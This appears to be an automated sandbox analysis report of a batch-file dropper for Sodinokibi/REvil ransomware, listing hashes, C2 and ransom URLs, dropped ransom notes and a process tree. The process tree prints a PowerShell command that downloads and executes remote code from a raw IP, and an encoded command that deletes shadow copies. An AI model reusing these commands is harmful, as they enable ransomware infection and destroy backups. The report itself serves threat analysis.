Analysis
max time kernel:  108s
max time network: 108s
platform:         windows7_x64
resource:         win7v200410
submitted:        18-04-2020 15:10

Static task: static1

Behavioral task: behavioral1
  Sample:   u3CD1fs9.bat
  Resource: win7v200410

Behavioral task: behavioral2
  Sample:   u3CD1fs9.bat
  Resource: win10v200410
General
Target: u3CD1fs9.bat
Size:   192B
MD5:    775b9f9c687e640c4e5a65c9512ef573
SHA1:   920bb3ec6c979520acefcb233670b18446ed09e9
SHA256: 97b4b68e56ffee83aa062e9f016df1f5c2e280b6df581deec97ced89667e8d1b
SHA512: e41e431075bf6869cfa5b1e90c267545f30bf7548fb91e7d729292b2a20b376553807ff45970250bf53e568cdc894e4482c77e82b98ac8c84403cd31d73b2a69
Malware Config
Extracted: http://185.103.242.78/pastes/u3CD1fs9
Extracted: C:\a55i656bw-readme.txt
  sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/86A547CCAB237928
  http://decryptor.cc/86A547CCAB237928
Signatures

Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes:
  pid   process
  1692  powershell.exe
  1692  powershell.exe
  1692  powershell.exe
  1792  powershell.exe
  1792  powershell.exe

Makes http(s) request (1 IoC)
Contacts server via http/https, possibly for C2 communication.
Processes:
  description  flow  ioc
  HTTP URL     3     http://185.103.242.78/pastes/u3CD1fs9
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Drops file in Program Files directory (16 IoCs)
Processes:
  description                   ioc                                                                                 process
  File created                  \??\c:\program files\a55i656bw-readme.txt                                           powershell.exe
  File opened for modification  \??\c:\program files\EnableSync.edrwx                                               powershell.exe
  File opened for modification  \??\c:\program files\SuspendGet.odt                                                 powershell.exe
  File created                  \??\c:\program files (x86)\a55i656bw-readme.txt                                     powershell.exe
  File opened for modification  \??\c:\program files\LimitGrant.snd                                                 powershell.exe
  File opened for modification  \??\c:\program files\CompleteUninstall.dotx                                         powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\a55i656bw-readme.txt      powershell.exe
  File opened for modification  \??\c:\program files\RegisterUnregister.mpg                                         powershell.exe
  File opened for modification  \??\c:\program files\SaveRepair.emz                                                 powershell.exe
  File opened for modification  \??\c:\program files\ConvertToRestore.ttc                                           powershell.exe
  File opened for modification  \??\c:\program files\DisableUndo.au3                                                powershell.exe
  File opened for modification  \??\c:\program files\JoinClear.pptm                                                 powershell.exe
  File opened for modification  \??\c:\program files\SwitchUnprotect.wm                                             powershell.exe
  File opened for modification  \??\c:\program files\UpdateUnpublish.xht                                            powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\a55i656bw-readme.txt          powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\a55i656bw-readme.txt  powershell.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes:
  description      ioc                                                                                                                                                  process
  Set value (str)  \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3z583vgo9pw.bmp"  powershell.exe
Suspicious use of WriteProcessMemory (5 IoCs)
Processes:
  description                        pid   process         target process
  PID 1684 wrote to memory of 1692   1684  cmd.exe         powershell.exe
  PID 1692 wrote to memory of 1792   1692  powershell.exe  powershell.exe
  PID 1692 wrote to memory of 1792   1692  powershell.exe  powershell.exe
  PID 1692 wrote to memory of 1792   1692  powershell.exe  powershell.exe
  PID 1692 wrote to memory of 1792   1692  powershell.exe  powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
  description                      pid   process
  Token: SeDebugPrivilege          1692  powershell.exe
  Token: SeDebugPrivilege          1692  powershell.exe
  Token: SeDebugPrivilege          1792  powershell.exe
  Token: SeBackupPrivilege         1508  vssvc.exe
  Token: SeRestorePrivilege        1508  vssvc.exe
  Token: SeAuditPrivilege          1508  vssvc.exe
  Token: SeTakeOwnershipPrivilege  1692  powershell.exe

Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
Processes:
  description  ioc                                                                               process
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                 vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer               vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                      vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer  vssvc.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes:
  pid   process
  1692  powershell.exe

Blacklisted process makes network request (1 IoC)
Processes:
  flow  pid   process
  3     1692  powershell.exe
Processes

C:\Windows\system32\cmd.exe (PID 1684)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\u3CD1fs9.bat"
  Signatures:
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1692)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/u3CD1fs9');Invoke-BJZXVCQKO;Start-Sleep -s 10000"
    Signatures:
    - Suspicious behavior: EnumeratesProcesses
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Blacklisted process makes network request

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1792)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (PID 1508)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service